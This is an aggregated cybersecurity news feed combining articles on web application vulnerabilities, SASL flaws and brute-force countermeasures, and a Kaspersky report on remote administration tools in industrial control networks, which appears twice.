Everybody worries about hacked voting machines. But an exercise in Boston last week showed how hackers can compromise the vote without ever touching an election system. Also: October is just around the corner and that means Cyber Security Awareness Month is upon us. So what are top cyber security professionals “aware of” these days? We talk...

Read the whole entry... »

Related Stories

Your Web Applications Are More Vulnerable Than You Think

A recent study shined a light on an attack vector that is often overlooked: the insecurity of web applications.

According to the report, issued by Positive Technologies, 44 percent of web applications are vulnerable to data leakage and security problems. In other words, threat actors have easy access to the personal customer data those applications handle across a variety of verticals such as banking, e-commerce and communications.

In addition, 48 percent of the applications were found to be vulnerable to unauthorized access, with 17 percent having exploits that could result in a full takeover by a threat actor. But perhaps the most eye-opening finding is that 100 percent of the web applications tested had some sort of vulnerability in general.

Security as an Afterthought

The web app as an attack vector isn’t a new problem, although we may not have realized how severe the vulnerabilities were. And worse, we’ve allowed the problem to linger: Many developers and IT decision-makers don’t take web app security seriously. Mozilla gave 93 percent of websites it observed a failing grade for security against cross-site scripting (XSS), for example. Application security tends to be treated as an afterthought, pushed behind other, more pressing security issues.

The biggest problem, no matter the programming language used, is XSS, according to the report. The authors also pointed to data leakage, fingerprinting and brute-force attacks as common issues across the board.

App Security Lags Despite Increasing Awareness

“Web application security is still poor and, despite increasing awareness of the risks, is still not being prioritized enough in the development process,” said Leigh-Anne Galloway, Positive Technologies cybersecurity resilience lead, as quoted in Infosecurity Magazine. “Most of these issues could have been prevented entirely by implementing secure development practices, including code audits from the start and throughout.”

Why is web app security falling behind? In a blog post for Secure Code Warrior, Pieter Danhieux blamed human behavior, stating that not only do humans behave in ways that introduce vulnerabilities and security threats, but developers aren’t always brought into the security loop.

“How are developers supposed to write secure code if nobody ever teaches them about why it’s important, the consequences of insecure code, and most importantly, how to prevent writing these vulnerabilities in their respective programming frameworks in the first place?” he wrote.

How Cybercriminals Exploit Web Applications to Spread Malware

The Postitive Technologies report cited two primary areas of motivation for cybercriminals to take advantage of web application vulnerabilities. The first is to use apps to infect and spread malware throughout enterprise networks.

“This method was used to spread the Bad Rabbit ransomware: attackers compromised web applications belonging to media outlets and masked malware as an Adobe Flash Player update installer,” the report explained.

In another case, an attacker exploited a vulnerability to disseminate phishing emails targeting bank employees.

Some threat don’t even involve direct attacks against web apps; cybercriminals can use applications in various ways to launch malware attacks. The moment your website or web application is compromised — no matter the method — your organization’s reputation takes a hit, which can lead to financial loss.

Data Theft in a Regulated World

The report also cited data theft as a key motivation for targeting web applications. Data leakage is a problem in any situation, be it customer data or corporate intellectual property. However, the stakes of stolen data have been raised in a post-General Data Protection Regulation (GDPR) and a pre-California Consumer Privacy Act (CCPA) world.

As more states decide to step up measures to protect customer data, any type of data loss can create extraordinary headaches for company leaders. Loss of data can cost an organization hundreds of thousands to millions of dollars in fines, according to data compiled by TermsFeed. At the same time, as more effort is put into data protection, stolen data will become more valuable on the dark web, encouraging threat actors to improve their targeting and attack styles.

How Can Companies Protect Web Applications?

Data privacy regulations require most companies to improve their web application security capabilities. IT leaders can start by building security measures directly into the app’s design as a way to put consumer security and privacy front and center.

“For application security, this means that security and privacy need to be thought about in the planning stages of the Software Development Life Cycle (SDLC),” cybersecurity expert Amit Ashbel wrote for ITProPortal. “Unfortunately, this is not currently the case with many organizations so this will be a large task for the industry.”

Built-in security and privacy measures are crucial. Web app developers should also implement a web application firewall, bolster password management, deploy mobile application management features and install security plugins where available.

As the Positive Technologies report pointed out, it is clear that security issues in web applications aren’t getting the attention they require, because their annual studies are finding the same mistakes and concerns repeating themselves. Lax security may have been overlooked in the past, but as privacy regulations and their consequences gain traction, application vulnerabilities and data leakage can cost your organization more than just a light fine and a slap on the wrist.

Read the IBM e-guide: 5 Steps to Achieve Risk-based Application Security Management

The post Your Web Applications Are More Vulnerable Than You Think appeared first on Security Intelligence.

Women in Information Security: Sharka

Due to popular demand, my women in information security interview series is back for autumn! This marks the second anniversary since I started. Some of my subjects in this round have been waiting since last spring, so getting to chat with them has been long overdue. Let’s start with Sharka, a penetration tester who is […]… Read More

The post Women in Information Security: Sharka appeared first on The State of Security.

The MyCloud Auth Vulnerability Fixed by Western Digital with a Hotfix

Western Digital have just released a hotfix as part of a firmware update to resolve the authentication bypass vulnerability (CVE-2018-17153)

The MyCloud Auth Vulnerability Fixed by Western Digital with a Hotfix on Latest Hacking News.

Cisco Patched Critical Vulnerability In Its Video Surveillance Manager Software

Recently, Cisco discovered a critical vulnerability in its Video Surveillance Manager during an internal security review. The vulnerability could allow

Cisco Patched Critical Vulnerability In Its Video Surveillance Manager Software on Latest Hacking News.

Cisco Patched Multiple Critical RCE Flaws in Webex Network Recording Player

Cisco has recently patched multiple vulnerabilities in the Webex Network Recording Player. Thanks to researchers from Trend Micro Zero Day

Cisco Patched Multiple Critical RCE Flaws in Webex Network Recording Player on Latest Hacking News.

Zero-Day Windows Jet Database Vulnerability Could Allow Remote Attacks

Researchers have discovered a zero-day vulnerability in the Microsoft Jet Database Engine that allows remote hacking of Windows systems. While

Zero-Day Windows Jet Database Vulnerability Could Allow Remote Attacks on Latest Hacking News.

Bitcoin Core Bug Could Crash The Entire Bitcoin Network

Nobody knew that the currency of the future was on the verge of collapse until the developers patched a critical

Bitcoin Core Bug Could Crash The Entire Bitcoin Network on Latest Hacking News.

Simple Authentication and Security Layer (SASL) vulnerabilities

Simple Authentication and Security Layer (SASL) is an authentication layer used in Internet protocols. SASL is not a protocol, but rather a framework that provides developers of applications and shared libraries with mechanisms for authentication, data integrity–checking, and encryption.

Within the framework and a few of its plugins, there are a couple of known vulnerabilities that we want to make you aware of. Although patches have been issued, not everyone has implemented them.

Why would I need to know about SASL?

Most server administrators will recognize the acronym from this type of error message or report:

“SASL LOGIN authentication failed: authentication failure”

Usually the message will contain more details about the failure, depending on the specific software and plugins that you are using. While receiving such a message in itself is not a reason for alarm, if you see it repeatedly and originating from the same IP address, then there is reason to investigate further. Possibly someone is trying to gain access to your server and planning to use it as a spam-box. They might be looking for a way to use your server and your resources to send out a spam campaign.

Countermeasures against brute force attacks

SASL attacks usually turn out to be brute force attacks, meaning an automated script or a bot is trying over and over to log into an existing email account on your server, trying many combinations of credentials to find a valid username and password pair. Thankfully, there are some countermeasures you can take against these attacks.

  • If you have the option to make your server listen on a different port, doing so might make you a less likely target for new attacks.
  • If the SASL message is from the same IP all the time, block that IP in your firewall.
  • If the attackers keep coming at you from different IPs, there are software solutions that use  machine learning to automatically block any new assailant. One caveat to this solution: Be vigilant about false positives so that you don’t shut out legitimate users, such as remote employees.

If you are seeing some of these attacks, there is no reason to feel singled out. There are threat actors out there that constantly sweep the Internet for new servers listening on port 25.

SASL framework

SASL is a framework for application protocols, such as SMTP or IMAP, that adds authentication support. It checks whether the user has the proper permissions to use the server in the way they request. It also offers a framework for data integrity–checking and encryption.

For a better understanding of how the framework actually works and where the vulnerabilities throw a wrench in the process, we want to give you some background about the flow of information between server and clients.

The following figure shows the basic SASL architecture:

sasl architecture

Client and server applications make calls to their local copies of the SASL library, or libsasl, through the SASL API. The libsasl then communicates with the SASL mechanisms through the SASL service provider interface (SPI).

The following diagram shows steps in the SASL life cycle. The client actions are shown on the left and the server actions on the right. The arrows in the middle show interactions between the client and server over an external connection.

sasl communication flowchart

Memcached vulnerability

Memcached is a software package that implements a high-performance caching server for storing chunks of data obtained from database and API calls in RAM. This helps speed up dynamic web applications, making it well suited for large websites and big-data projects.

In 2016, security researchers from Cisco’s Talos found three remote code execution vulnerabilities. All of these flaws affected memcached’s binary protocol for storing and retrieving data, and one of them was in the Simple Authentication and Security Layer (SASL) implementation. These vulnerabilities were fixed by Memcached later that year, but there has been a bad adoption rate.

Dovecot server vulnerabilities

A Denial of Service vulnerability was found in the SASL authentication component of the Dovecot server. Remote attackers can crash vulnerable systems due to a validation error when the vulnerable software handles a crafted username when processing SASL authentication if the auth-policy component has been activated. The vulnerable versions were 2.2.25 through 2.2.26.1, and unfortunately some of these are still in active use.

Another flaw was found in Dovecot 2.0 up to 2.2.33 and 2.3.0. An abort of SASL authentication results in a memory leak in the Dovecot auth client used by login processes. The leak has an impact on high-performance configurations where the same login processes are reused and can cause the process to crash due to memory exhaustion.

More recent vulnerabilities

A more recent vulnerability was found in Apache Qpid Broker. Both the Qpid broker and Qpid clients use the Cyrus SASL library, a full-featured authentication framework, which offers many configuration options. An authentication of incoming AMQP connections in Apache Qpid Broker-J is performed by special entities called “Authentication Providers.” Each Authentication Provider can support several SASL mechanisms, which are offered to the connecting clients as part of SASL negotiation process.

The vulnerability that was discovered is a Denial of Service vulnerability, and it was found in Apache Qpid Broker-J 7.0.0 in the functionality for authentication of connections for AMQP protocols 0-8, 0-9, 0-91, and 0-10 when either PLAIN or XOAUTH2 SASL mechanism is used. The vulnerability allows an unauthenticated attacker to crash the Broker instance.

Update your software

As you can see, there are quite a few of these vulnerabilities still active, and I didn’t even touch on the older ones. In fact, there are a lot more older vulnerabilities than new ones, and I’m afraid that not all of them have been patched.

So we can’t say this enough, and we won’t stop telling you, either: Always make sure you are running the latest and patched version of the software you are using. This is especially true when talking about Internet-facing servers, and absolutely vital if one of their jobs is to keep your resources safe and secure. SASL is a vital authentication mechanism, in particular where many email servers are concerned.

Stay safe, everyone!

 

The figures in this article are courtesy of Oracle.

The post Simple Authentication and Security Layer (SASL) vulnerabilities appeared first on Malwarebytes Labs.

Adobe Addresses a Number of Critical Remote Execution Vulnerabilities

Adobe has addressed several vulnerabilities in Acrobat DC and Acrobat Reader DC by also including one of the several vulnerabilities

Adobe Addresses a Number of Critical Remote Execution Vulnerabilities on Latest Hacking News.

Authentication Bypass Vulnerability Disclosed in Western Digital My Cloud NAS Devices

Security Researchers at Securify have found an elevation of privilege vulnerability in the WD MyCloud platform which can be exploited by

Authentication Bypass Vulnerability Disclosed in Western Digital My Cloud NAS Devices on Latest Hacking News.

Threats posed by using RATs in ICS

While conducting audits, penetration tests and incident investigations, we have often come across legitimate remote administration tools (RAT) for PCs installed on operational technology (OT) networks of industrial enterprises. In a number of incidents that we have investigated, threat actors had used RATs to attack industrial organizations. In some cases, the attackers had stealthily installed RATs on victim organizations’ computers, while in other cases, they had been able to use the RATs that were installed in the organization at the time of the attacks. These observations prompted us to analyze the scope of the threat, including the incidence of RATs on industrial networks and the reasons for using them.

Methodology

The statistical data presented in this paper was collected using the Kaspersky Security Network (KSN) from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:

  • supervisory control and data acquisition (SCADA) servers;
  • data storage servers (Historian);
  • data gateways (OPC);
  • stationary workstations of engineers and operators;
  • mobile workstations of engineers and operators;
  • Human Machine Interface (HMI).

As part of our research, we considered and analyzed all popular RATs for Windows, with the exception of Remote Desktop, which is part of the Windows operating system. Our research into this RAT is ongoing and will be presented in the next paper of the series.

The use of RATs in ICS

According to KSN data, in the first half of 2018, legitimate RATs (programs categorized as not-a-virus: RemoteAdmin) were installed and used on one ICS computer in three.

Percentage of ICS computers that have RATs legitimately installed on them (download)

The statistics support our observations: RATs are indeed often used on OT networks of industrial enterprises. We believe this could be due to attempts to reduce costs associated with maintaining ICS and minimize the response time in the event of malfunction.

As we were able to find out, remote access to computers on the OT network is not restricted to administrators and engineers inside the enterprise network’s perimeter. It can also be made available via the internet to users outside the enterprise network perimeter. Such users can include representatives of third-party enterprises – employees of system integrators or ICS vendors, who use RATs for diagnostics, maintenance and to address any ICS malfunctions. As our industrial network security audits have shown, such access is often poorly supervised by the enterprise’s responsible employees, while remote users connecting to the OT network often have excessive rights, such as local administrator privileges, which is obviously a serious issue in terms of ensuring the information security of industrial automation systems.

From interviews with engineers and operators of various industrial systems that we have audited, and based on an analysis of ICS user documentation, we have determined that RATs are most commonly used on industrial networks according to the following scenarios:

  1. To control/monitor HMI from an operator workstation (including displaying information on a large screen);
  2. To control/maintain HMI from an engineering workstation;
  3. To control SCADA from an operator workstation;
  4. To provide SCADA maintenance from an engineering workstation or a computer of a contractor/vendor (from an external network);
  5. To connect multiple operators to one operator workstation (thin client-like architecture used to save money on licenses for the software used on operator workstations);
  6. To connect to a computer on the office network from the OT network via HMI and perform various tasks on that computer (access email, access the internet, work with office documents, etc.).

Some of the scenarios listed above indicate that the use of RATs on the OT network can be explained by operational requirements, which means that giving up the use of RATs would unavoidably entail modifications to work processes. At the same time, it is important to realize that an attack on a poorly protected RAT could easily cause disruptions to the industrial process and any decisions on using RATs on the OT network should be made with this in mind. Tight controls on the use of RATs on the OT network would help to reduce the attack surface and the risk of infection for systems administered remotely.

TOP 20 countries by percentage of ICS computers on which RATs were used at least once during the first half of 2018 (to all ICS computers in each country) (download)

Scenarios of RAT installation on ICS computers

According to our research, there are three most common scenarios of RAT installation on ICS computers:

  1. Installation of ICS software distribution packages that include RATs (using separate distribution packages or ICS software installers). RATs included in ICS software distribution packages make up 18.6% of all RATs we have identified on ICS computers protected by Kaspersky Lab products.

Percentage of RATs bundled with ICS products to all RATs found on ICS computers (download)

  1. Deliberate installation of RATs by personnel or suppliers – network administrators, engineers, operators, or integrator companies. We do not undertake to judge whether these installations are legitimate. Based on our experience of industrial network audits and incident investigation, we can state that many such installations do not comply with the organization’s information security policy and some are installed without the knowledge of respective enterprises’ responsible employees.
  2. Stealthy installation of RATs by malware. An example of this is a recent attack that we have investigated (see below).

Threats associated with the use of RATs on industrial networks are not always obvious, nor are the reasons for which RATs are used.

Most of the RATs we have identified on industrial systems have the following characteristics that significantly reduce the security level of the host system:

  • Elevated privileges – the server part of a RAT is often executed as a service with system privileges, i.e., NT SYSTEM;
  • No support for restricting local access to the system / client activity;
  • Single-factor authentication;
  • No logging of client activity;
  • Vulnerabilities (our report on zero-day vulnerabilities identified in popular RAT systems that are used, among other applications, in products by many ICS vendors, will be published by the end of the year);
  • The use of relay servers (for reverse connections) that enable RATs to bypass NAT and firewall restrictions on the network perimeter.

The most critical RAT-related problem is the use of elevated privileges and the absence of any means to limit these privileges (or to restrict a remote user’s local access). In practice, this means that if attackers (or malware) gain access to a remote user’s computer, steal authentication data (login/password), hijack an active remote administration session or successfully attack a vulnerability in the RAT’s server part, they will gain unrestricted control of the ICS system. By using relay servers for reverse connections, attackers can also connect to these RATs from anywhere in the world.

There are also other issues that affect RATs built into ICS software distribution packages:

  • RAT components and distribution packages are rarely updated (even if new versions of ICS distribution packages are released). This makes them more likely to contain vulnerabilities;
  • In the vast majority of cases, the default password is used – it is either hardcoded into the RAT by the ICS software vendor or specified in the documentation as “recommended”.

RATs are legitimate software tools that are often used on industrial networks, which means it can be extremely difficult to distinguish attacks involving RATs from legitimate activity. In addition, since the information security service and other employees responsible for ICS security are often unaware that a RAT is installed, the configuration of RATs is in most cases not analyzed when auditing the security of an industrial network. This makes it particularly important to control by whom, when and for what purposes RATs are used on the industrial network and to ensure that it is completely impossible to use RATs without the knowledge of employees responsible for the OT network’s information security.

Attacks of threat actors involving RATs

Everything written above applies to potential threats associated with the use of RATs.

Based on our analysis of KSN statistics, we were able to identify a number of attacks and malware infection attempts involving RATs installed on ICS computers. In most cases, attacks were based on the following scenarios (in the descending order of attack incidence):

  1. A brute force network attack from the local network or the internet designed to crack logins/passwords;
  2. An attacker or malware using a RAT to download and execute malware using stolen or cracked authentication credentials;
  3. A remote user (probably a legitimate user deceived by attackers) using a RAT to download a Trojan to an ICS computer and then executing it; the Trojan can be disguised as an office document, non-industrial software (a game, multimedia software, etc.), a crack/keygen for office, application or industrial software, etc.;
  4. A network attack from the local network or the internet on the server part of the RAT using exploits.

Brute force type network attacks (designed to crack logins/passwords) are the most common: their implementation does not require any special knowledge or skills and the software used in such attacks is publicly available.

It cannot be determined based on available data who connects to a RAT’s server part installed on an ICS computer – a legitimate user, an attacker or malware – or why. Consequently, we can only guess whether this activity represents a targeted attack, sabotage attempts or a client’s error.

Network attacks from the internet were most probably conducted by threat actors using malware, penetration testing tools or botnets.

Network attacks from the local network could indicate the presence of attackers (possibly including an insider) on the network. Another possibility is that there is a compromised computer on the local network that is either infected with malware or is used by the attacker as a point of presence (if the authentication credentials were compromised earlier).

Attacks on industrial enterprises using RMS and TeamViewer

In the first half of 2018, Kaspersky Lab ICS CERT identified a new wave of phishing emails disguised as legitimate commercial offers. Although the attacks targeted primarily industrial companies within the territory of Russia, the same tactics and tools can be used in attacks on industrial companies in any country of the world.

The malware used in these attacks installs legitimate remote administration software on the system — TeamViewer or Remote Manipulator System/Remote Utilities (RMS). In both cases, a system DLL is replaced with a malicious library to inject malicious code into a legitimate program’s process. This provides the attackers with remote control of the infected systems. Various techniques are used to mask the infection and the activity of the software installed on the system.

If necessary, the attackers download an additional malware pack to the system, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools that extend the threat actor’s control of infected systems, malware to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.

According to available data, the attackers’ main goal is to steal money from victim organizations’ accounts, but possible attack scenarios are not limited to the theft of funds. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines. Clearly, on top of the financial losses, these attacks result in leaks of victim organizations’ sensitive data.

Multiple attacks on an auto manufacturer

A characteristic example of attacks based on the second scenario was provided by attacks on the industrial network of a motor vehicle manufacturing and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles. Multiple attempts to conduct such attacks were blocked by Kaspersky Lab products.

A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Starting in late 2017, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. Infection attempts were made regularly over a period of several months – 2-3 times a week, at different times of the day. Based in part on other indirect indicators, we believe that RAT authentication data was compromised and used by attackers (or malware) to attack the enterprise’s computers over the internet.

After gaining access to the potential victim’s infrastructure via the RAT, the attackers kept trying to choose a malicious packer that would enable them to evade antivirus protection.

The blocked programs included modifications of the malware detected by Kaspersky Lab products as Net-Worm.Win32.Agent.pm. When launched this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

The Nymaim Trojan family was also blocked. Representatives of this family are often used to download modifications of botnet agents from the Necus family, which in turn have often been used to infect computers with ransomware from the Locky family.

Conclusion

Remote administration tools are widely used on industrial networks for ICS monitoring, control and maintenance. The ability to manipulate the ICS remotely significantly reduces maintenance costs, but at the same time, uncontrolled remote access, the inability to provide 100% verification of the remote client’s legitimacy, and the vulnerabilities in RAT code and configuration significantly increase the attack surface. At the same time, RATs, along with other legitimate tools, are increasingly used by attackers to mask malicious activity and make attribution more difficult.

To reduce the risk of cyberattacks involving RATs, we recommend the following high-priority measures:

  • Audit the use of application and system remote administration tools on the industrial network, such as VNC, RDP, TeamViewer, and RMS / Remote Utilities. Remove all remote administration tools that are not required by the industrial process.
  • Conduct an audit and disable remote administration tools which came with ICS software (refer to the relevant software documentation for detailed instructions), provided that they are not required by the industrial process.
  • Closely monitor and log events for each remote control session required by the industrial process; remote access should be disabled by default and enabled only upon request and only for limited periods of time.

Securelist – Kaspersky Lab’s cyberthreat research and reports: Threats posed by using RATs in ICS

While conducting audits, penetration tests and incident investigations, we have often come across legitimate remote administration tools (RAT) for PCs installed on operational technology (OT) networks of industrial enterprises. In a number of incidents that we have investigated, threat actors had used RATs to attack industrial organizations. In some cases, the attackers had stealthily installed RATs on victim organizations’ computers, while in other cases, they had been able to use the RATs that were installed in the organization at the time of the attacks. These observations prompted us to analyze the scope of the threat, including the incidence of RATs on industrial networks and the reasons for using them.

Methodology

The statistical data presented in this paper was collected using the Kaspersky Security Network (KSN) from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:

  • supervisory control and data acquisition (SCADA) servers;
  • data storage servers (Historian);
  • data gateways (OPC);
  • stationary workstations of engineers and operators;
  • mobile workstations of engineers and operators;
  • Human Machine Interface (HMI).

As part of our research, we considered and analyzed all popular RATs for Windows, with the exception of Remote Desktop, which is part of the Windows operating system. Our research into this RAT is ongoing and will be presented in the next paper of the series.

The use of RATs in ICS

According to KSN data, in the first half of 2018, legitimate RATs (programs categorized as not-a-virus: RemoteAdmin) were installed and used on one ICS computer in three.

&&

Percentage of ICS computers that have RATs legitimately installed on them (download)

The statistics support our observations: RATs are indeed often used on OT networks of industrial enterprises. We believe this could be due to attempts to reduce costs associated with maintaining ICS and minimize the response time in the event of malfunction.

As we were able to find out, remote access to computers on the OT network is not restricted to administrators and engineers inside the enterprise network’s perimeter. It can also be made available via the internet to users outside the enterprise network perimeter. Such users can include representatives of third-party enterprises – employees of system integrators or ICS vendors, who use RATs for diagnostics, maintenance and to address any ICS malfunctions. As our industrial network security audits have shown, such access is often poorly supervised by the enterprise’s responsible employees, while remote users connecting to the OT network often have excessive rights, such as local administrator privileges, which is obviously a serious issue in terms of ensuring the information security of industrial automation systems.

From interviews with engineers and operators of various industrial systems that we have audited, and based on an analysis of ICS user documentation, we have determined that RATs are most commonly used on industrial networks according to the following scenarios:

  1. To control/monitor HMI from an operator workstation (including displaying information on a large screen);
  2. To control/maintain HMI from an engineering workstation;
  3. To control SCADA from an operator workstation;
  4. To provide SCADA maintenance from an engineering workstation or a computer of a contractor/vendor (from an external network);
  5. To connect multiple operators to one operator workstation (thin client-like architecture used to save money on licenses for the software used on operator workstations);
  6. To connect to a computer on the office network from the OT network via HMI and perform various tasks on that computer (access email, access the internet, work with office documents, etc.).

Some of the scenarios listed above indicate that the use of RATs on the OT network can be explained by operational requirements, which means that giving up the use of RATs would unavoidably entail modifications to work processes. At the same time, it is important to realize that an attack on a poorly protected RAT could easily cause disruptions to the industrial process and any decisions on using RATs on the OT network should be made with this in mind. Tight controls on the use of RATs on the OT network would help to reduce the attack surface and the risk of infection for systems administered remotely.

&&

TOP 20 countries by percentage of ICS computers on which RATs were used at least once during the first half of 2018 (to all ICS computers in each country) (download)

Scenarios of RAT installation on ICS computers

According to our research, there are three most common scenarios of RAT installation on ICS computers:

  1. Installation of ICS software distribution packages that include RATs (using separate distribution packages or ICS software installers). RATs included in ICS software distribution packages make up 18.6% of all RATs we have identified on ICS computers protected by Kaspersky Lab products.

&&

Percentage of RATs bundled with ICS products to all RATs found on ICS computers (download)

  1. Deliberate installation of RATs by personnel or suppliers – network administrators, engineers, operators, or integrator companies. We do not undertake to judge whether these installations are legitimate. Based on our experience of industrial network audits and incident investigation, we can state that many such installations do not comply with the organization’s information security policy and some are installed without the knowledge of respective enterprises’ responsible employees.
  2. Stealthy installation of RATs by malware. An example of this is a recent attack that we have investigated (see below).

Threats associated with the use of RATs on industrial networks are not always obvious, nor are the reasons for which RATs are used.

Most of the RATs we have identified on industrial systems have the following characteristics that significantly reduce the security level of the host system:

  • Elevated privileges – the server part of a RAT is often executed as a service with system privileges, i.e., NT SYSTEM;
  • No support for restricting local access to the system / client activity;
  • Single-factor authentication;
  • No logging of client activity;
  • Vulnerabilities (our report on zero-day vulnerabilities identified in popular RAT systems that are used, among other applications, in products by many ICS vendors, will be published by the end of the year);
  • The use of relay servers (for reverse connections) that enable RATs to bypass NAT and firewall restrictions on the network perimeter.

The most critical RAT-related problem is the use of elevated privileges and the absence of any means to limit these privileges (or to restrict a remote user’s local access). In practice, this means that if attackers (or malware) gain access to a remote user’s computer, steal authentication data (login/password), hijack an active remote administration session or successfully attack a vulnerability in the RAT’s server part, they will gain unrestricted control of the ICS system. By using relay servers for reverse connections, attackers can also connect to these RATs from anywhere in the world.

There are also other issues that affect RATs built into ICS software distribution packages:

  • RAT components and distribution packages are rarely updated (even if new versions of ICS distribution packages are released). This makes them more likely to contain vulnerabilities;
  • In the vast majority of cases, the default password is used – it is either hardcoded into the RAT by the ICS software vendor or specified in the documentation as “recommended”.

RATs are legitimate software tools that are often used on industrial networks, which means it can be extremely difficult to distinguish attacks involving RATs from legitimate activity. In addition, since the information security service and other employees responsible for ICS security are often unaware that a RAT is installed, the configuration of RATs is in most cases not analyzed when auditing the security of an industrial network. This makes it particularly important to control by whom, when and for what purposes RATs are used on the industrial network and to ensure that it is completely impossible to use RATs without the knowledge of employees responsible for the OT network’s information security.

Attacks of threat actors involving RATs

Everything written above applies to potential threats associated with the use of RATs.

Based on our analysis of KSN statistics, we were able to identify a number of attacks and malware infection attempts involving RATs installed on ICS computers. In most cases, attacks were based on the following scenarios (in the descending order of attack incidence):

  1. A brute force network attack from the local network or the internet designed to crack logins/passwords;
  2. An attacker or malware using a RAT to download and execute malware using stolen or cracked authentication credentials;
  3. A remote user (probably a legitimate user deceived by attackers) using a RAT to download a Trojan to an ICS computer and then executing it; the Trojan can be disguised as an office document, non-industrial software (a game, multimedia software, etc.), a crack/keygen for office, application or industrial software, etc.;
  4. A network attack from the local network or the internet on the server part of the RAT using exploits.

Brute force type network attacks (designed to crack logins/passwords) are the most common: their implementation does not require any special knowledge or skills and the software used in such attacks is publicly available.

It cannot be determined based on available data who connects to a RAT’s server part installed on an ICS computer – a legitimate user, an attacker or malware – or why. Consequently, we can only guess whether this activity represents a targeted attack, sabotage attempts or a client’s error.

Network attacks from the internet were most probably conducted by threat actors using malware, penetration testing tools or botnets.

Network attacks from the local network could indicate the presence of attackers (possibly including an insider) on the network. Another possibility is that there is a compromised computer on the local network that is either infected with malware or is used by the attacker as a point of presence (if the authentication credentials were compromised earlier).

Attacks on industrial enterprises using RMS and TeamViewer

In the first half of 2018, Kaspersky Lab ICS CERT identified a new wave of phishing emails disguised as legitimate commercial offers. Although the attacks targeted primarily industrial companies within the territory of Russia, the same tactics and tools can be used in attacks on industrial companies in any country of the world.

The malware used in these attacks installs legitimate remote administration software on the system — TeamViewer or Remote Manipulator System/Remote Utilities (RMS). In both cases, a system DLL is replaced with a malicious library to inject malicious code into a legitimate program’s process. This provides the attackers with remote control of the infected systems. Various techniques are used to mask the infection and the activity of the software installed on the system.

If necessary, the attackers download an additional malware pack to the system, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools that extend the threat actor’s control of infected systems, malware to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.

According to available data, the attackers’ main goal is to steal money from victim organizations’ accounts, but possible attack scenarios are not limited to the theft of funds. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines. Clearly, on top of the financial losses, these attacks result in leaks of victim organizations’ sensitive data.

Multiple attacks on an auto manufacturer

A characteristic example of attacks based on the second scenario was provided by attacks on the industrial network of a motor vehicle manufacturing and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles. Multiple attempts to conduct such attacks were blocked by Kaspersky Lab products.

A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Starting in late 2017, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. Infection attempts were made regularly over a period of several months – 2-3 times a week, at different times of the day. Based in part on other indirect indicators, we believe that RAT authentication data was compromised and used by attackers (or malware) to attack the enterprise’s computers over the internet.

After gaining access to the potential victim’s infrastructure via the RAT, the attackers kept trying to choose a malicious packer that would enable them to evade antivirus protection.

The blocked programs included modifications of the malware detected by Kaspersky Lab products as Net-Worm.Win32.Agent.pm. When launched this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

The Nymaim Trojan family was also blocked. Representatives of this family are often used to download modifications of botnet agents from the Necus family, which in turn have often been used to infect computers with ransomware from the Locky family.

Conclusion

Remote administration tools are widely used on industrial networks for ICS monitoring, control and maintenance. The ability to manipulate the ICS remotely significantly reduces maintenance costs, but at the same time, uncontrolled remote access, the inability to provide 100% verification of the remote client’s legitimacy, and the vulnerabilities in RAT code and configuration significantly increase the attack surface. At the same time, RATs, along with other legitimate tools, are increasingly used by attackers to mask malicious activity and make attribution more difficult.

To reduce the risk of cyberattacks involving RATs, we recommend the following high-priority measures:

  • Audit the use of application and system remote administration tools on the industrial network, such as VNC, RDP, TeamViewer, and RMS / Remote Utilities. Remove all remote administration tools that are not required by the industrial process.
  • Conduct an audit and disable remote administration tools which came with ICS software (refer to the relevant software documentation for detailed instructions), provided that they are not required by the industrial process.
  • Closely monitor and log events for each remote control session required by the industrial process; remote access should be disabled by default and enabled only upon request and only for limited periods of time.


Securelist - Kaspersky Lab’s cyberthreat research and reports

11M Records of E-Marketing Data Exposed Online From Unsecured MongoDB Instance

It has only been a week since we heard of the massive Veeam data leakage from misconfigured MongoDB server incident. The

11M Records of E-Marketing Data Exposed Online From Unsecured MongoDB Instance on Latest Hacking News.

SecurityWeek RSS Feed: Click2Gov Attacks on U.S. Cities Attributed to Previously Unknown Group

A previously unknown financially motivated threat group is believed to be behind a series of attacks whose goal was to obtain payment card data from U.S. cities relying on Click2Gov software for utility bill payments.

read more



SecurityWeek RSS Feed

When It Comes to Cloud Data Protection, Defend Your Information Like a Guard Dog

 

These days, enterprises are increasingly running their business from the cloud. But the portion of your business that’s running in this environment presents numerous security challenges. When it comes to cloud data protection, it’s not just credit card numbers and personally identifiable information (PII) that need protecting, but also the data that represents the majority of your company’s value: your intellectual property. This includes your product designs, marketing strategy, financial plans and more. To add to the complexity, much of that data is stored in disparate repositories.

How do you know if you’re doing enough to protect the cloud-stored data that’s most crucial to your business? To keep malicious actors away from your cloud-bound crown jewels, you need the cybersecurity equivalent of a guard dog — one that knows when to bark, when to bite and when to grant access to those within its circle of trust.

Let’s take a closer look at some challenges related to protecting data in the cloud and outline key considerations when selecting a cloud security provider.

What to Do When Data Is Out of Your Hands

